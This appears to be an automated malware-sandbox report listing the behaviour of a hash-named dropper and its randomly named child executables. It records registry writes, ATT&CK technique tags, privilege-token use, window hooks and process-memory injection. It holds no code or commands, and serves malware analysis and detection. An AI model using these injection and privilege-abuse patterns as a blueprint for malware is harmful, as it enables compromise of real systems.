Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2276 reg.exe
4584 reg.exe
Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

3872 PING.EXE
3344 PING.EXE
1056 PING.EXE
908 PING.EXE
4748 PING.EXE

pid	process
2276	reg.exe
4584	reg.exe

pid	process
3872	PING.EXE
3344	PING.EXE
1056	PING.EXE
908	PING.EXE
4748	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exeHOac2Tsz9nY_mLeQOxIqTrPa.exelch9FZIjmxIojKvTXJL4TNoV.exeste63gP8m0N_8sNN3Z5ET2Dq.exeAdblock.exe

pid	process
1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
4492	HOac2Tsz9nY_mLeQOxIqTrPa.exe
4492	HOac2Tsz9nY_mLeQOxIqTrPa.exe
4492	HOac2Tsz9nY_mLeQOxIqTrPa.exe
4492	HOac2Tsz9nY_mLeQOxIqTrPa.exe
1748	lch9FZIjmxIojKvTXJL4TNoV.exe
1748	lch9FZIjmxIojKvTXJL4TNoV.exe
1476	ste63gP8m0N_8sNN3Z5ET2Dq.exe
1476	ste63gP8m0N_8sNN3Z5ET2Dq.exe
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
4148	Adblock.exe
4148	Adblock.exe
4148	Adblock.exe
4148	Adblock.exe
4148	Adblock.exe
4148	Adblock.exe
4148	Adblock.exe
4148	Adblock.exe
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064
3064

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3064
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

lch9FZIjmxIojKvTXJL4TNoV.exeXtnimG3Crj_efkljVY9dM1RR.exe

pid process

1748 lch9FZIjmxIojKvTXJL4TNoV.exe
1340 XtnimG3Crj_efkljVY9dM1RR.exe

pid	process
3064

pid	process
1748	lch9FZIjmxIojKvTXJL4TNoV.exe
1340	XtnimG3Crj_efkljVY9dM1RR.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

robocopy.exeHOac2Tsz9nY_mLeQOxIqTrPa.exeschtasks.exetasklist.exeDnsService.exeLp2dbwbN2T8SL7q6CUPPNX_e.exerobocopy.execrashpad_handler.exe

description	pid	process
Token: SeBackupPrivilege	4896	robocopy.exe
Token: SeRestorePrivilege	4896	robocopy.exe
Token: SeSecurityPrivilege	4896	robocopy.exe
Token: SeTakeOwnershipPrivilege	4896	robocopy.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeDebugPrivilege	4492	HOac2Tsz9nY_mLeQOxIqTrPa.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeDebugPrivilege	4400	schtasks.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeDebugPrivilege	4704	tasklist.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeDebugPrivilege	2664	DnsService.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeDebugPrivilege	3784	Lp2dbwbN2T8SL7q6CUPPNX_e.exe
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeShutdownPrivilege	3064
Token: SeCreatePagefilePrivilege	3064
Token: SeBackupPrivilege	4736	robocopy.exe
Token: SeRestorePrivilege	4736	robocopy.exe
Token: SeSecurityPrivilege	4736	robocopy.exe
Token: SeTakeOwnershipPrivilege	4736	robocopy.exe
Token: SeBackupPrivilege	1852	crashpad_handler.exe

Suspicious use of FindShellTrayWindow 11 IoCs

Processes:

3z0raPKfhernw_IBr0j2szjl.tmpVirtual.exe.pifAdblock.exe

pid process

368 3z0raPKfhernw_IBr0j2szjl.tmp
1192 Virtual.exe.pif
3064
3064
1192 Virtual.exe.pif
1192 Virtual.exe.pif
3064
3064
4148 Adblock.exe
3064
3064
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Virtual.exe.pifAdblock.exe

pid process

1192 Virtual.exe.pif
1192 Virtual.exe.pif
1192 Virtual.exe.pif
4148 Adblock.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Adblock.exe

pid process

4148 Adblock.exe
4148 Adblock.exe
4148 Adblock.exe
4148 Adblock.exe

pid	process
368	3z0raPKfhernw_IBr0j2szjl.tmp
1192	Virtual.exe.pif
3064
3064
1192	Virtual.exe.pif
1192	Virtual.exe.pif
3064
3064
4148	Adblock.exe
3064
3064

pid	process
1192	Virtual.exe.pif
1192	Virtual.exe.pif
1192	Virtual.exe.pif
4148	Adblock.exe

pid	process
4148	Adblock.exe
4148	Adblock.exe
4148	Adblock.exe
4148	Adblock.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exelUEr_IaF1m_MA_fMKs0cPWZL.exe9X_l4OzNkIFcc_mhRCRPuCKg.exe3z0raPKfhernw_IBr0j2szjl.tmpsvchost.exeVSAys9Q8JaBCGDxuKx0c866l.exevisFT3lSO_8ZOfZv5P69I2QI.exe

description	pid	process	target process
PID 1584 wrote to memory of 3784	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	Lp2dbwbN2T8SL7q6CUPPNX_e.exe
PID 1584 wrote to memory of 3784	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	Lp2dbwbN2T8SL7q6CUPPNX_e.exe
PID 1584 wrote to memory of 3784	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	Lp2dbwbN2T8SL7q6CUPPNX_e.exe
PID 1584 wrote to memory of 4880	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	9X_l4OzNkIFcc_mhRCRPuCKg.exe
PID 1584 wrote to memory of 4880	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	9X_l4OzNkIFcc_mhRCRPuCKg.exe
PID 1584 wrote to memory of 4880	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	9X_l4OzNkIFcc_mhRCRPuCKg.exe
PID 1584 wrote to memory of 4492	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	HOac2Tsz9nY_mLeQOxIqTrPa.exe
PID 1584 wrote to memory of 4492	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	HOac2Tsz9nY_mLeQOxIqTrPa.exe
PID 1584 wrote to memory of 4492	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	HOac2Tsz9nY_mLeQOxIqTrPa.exe
PID 1584 wrote to memory of 3952	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	visFT3lSO_8ZOfZv5P69I2QI.exe
PID 1584 wrote to memory of 3952	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	visFT3lSO_8ZOfZv5P69I2QI.exe
PID 1584 wrote to memory of 3952	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	visFT3lSO_8ZOfZv5P69I2QI.exe
PID 1584 wrote to memory of 3128	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	VSAys9Q8JaBCGDxuKx0c866l.exe
PID 1584 wrote to memory of 3128	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	VSAys9Q8JaBCGDxuKx0c866l.exe
PID 1584 wrote to memory of 3128	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	VSAys9Q8JaBCGDxuKx0c866l.exe
PID 1584 wrote to memory of 4740	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	lUEr_IaF1m_MA_fMKs0cPWZL.exe
PID 1584 wrote to memory of 4740	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	lUEr_IaF1m_MA_fMKs0cPWZL.exe
PID 1584 wrote to memory of 4740	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	lUEr_IaF1m_MA_fMKs0cPWZL.exe
PID 1584 wrote to memory of 1084	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 1584 wrote to memory of 1084	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 1584 wrote to memory of 1084	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 1584 wrote to memory of 1748	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	lch9FZIjmxIojKvTXJL4TNoV.exe
PID 1584 wrote to memory of 1748	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	lch9FZIjmxIojKvTXJL4TNoV.exe
PID 1584 wrote to memory of 1748	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	lch9FZIjmxIojKvTXJL4TNoV.exe
PID 1584 wrote to memory of 3436	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
PID 1584 wrote to memory of 3436	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
PID 1584 wrote to memory of 3436	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
PID 1584 wrote to memory of 4592	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	8LGCVbQpmBGp3olFcvsyLfbQ.exe
PID 1584 wrote to memory of 4592	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	8LGCVbQpmBGp3olFcvsyLfbQ.exe
PID 1584 wrote to memory of 4592	1584	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe	8LGCVbQpmBGp3olFcvsyLfbQ.exe
PID 4740 wrote to memory of 4896	4740	lUEr_IaF1m_MA_fMKs0cPWZL.exe	robocopy.exe
PID 4740 wrote to memory of 4896	4740	lUEr_IaF1m_MA_fMKs0cPWZL.exe	robocopy.exe
PID 4740 wrote to memory of 4896	4740	lUEr_IaF1m_MA_fMKs0cPWZL.exe	robocopy.exe
PID 4880 wrote to memory of 368	4880	9X_l4OzNkIFcc_mhRCRPuCKg.exe	control.exe
PID 4880 wrote to memory of 368	4880	9X_l4OzNkIFcc_mhRCRPuCKg.exe	control.exe
PID 4880 wrote to memory of 368	4880	9X_l4OzNkIFcc_mhRCRPuCKg.exe	control.exe
PID 368 wrote to memory of 4500	368	3z0raPKfhernw_IBr0j2szjl.tmp	rundll32.exe
PID 368 wrote to memory of 4500	368	3z0raPKfhernw_IBr0j2szjl.tmp	rundll32.exe
PID 368 wrote to memory of 4500	368	3z0raPKfhernw_IBr0j2szjl.tmp	rundll32.exe
PID 1084 wrote to memory of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 1084 wrote to memory of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 1084 wrote to memory of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 3128 wrote to memory of 2820	3128	VSAys9Q8JaBCGDxuKx0c866l.exe	VSAys9Q8JaBCGDxuKx0c866l.exe
PID 3128 wrote to memory of 2820	3128	VSAys9Q8JaBCGDxuKx0c866l.exe	VSAys9Q8JaBCGDxuKx0c866l.exe
PID 3128 wrote to memory of 2820	3128	VSAys9Q8JaBCGDxuKx0c866l.exe	VSAys9Q8JaBCGDxuKx0c866l.exe
PID 3128 wrote to memory of 2820	3128	VSAys9Q8JaBCGDxuKx0c866l.exe	VSAys9Q8JaBCGDxuKx0c866l.exe
PID 3128 wrote to memory of 2820	3128	VSAys9Q8JaBCGDxuKx0c866l.exe	VSAys9Q8JaBCGDxuKx0c866l.exe
PID 3128 wrote to memory of 2820	3128	VSAys9Q8JaBCGDxuKx0c866l.exe	VSAys9Q8JaBCGDxuKx0c866l.exe
PID 1084 wrote to memory of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 1084 wrote to memory of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 1084 wrote to memory of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
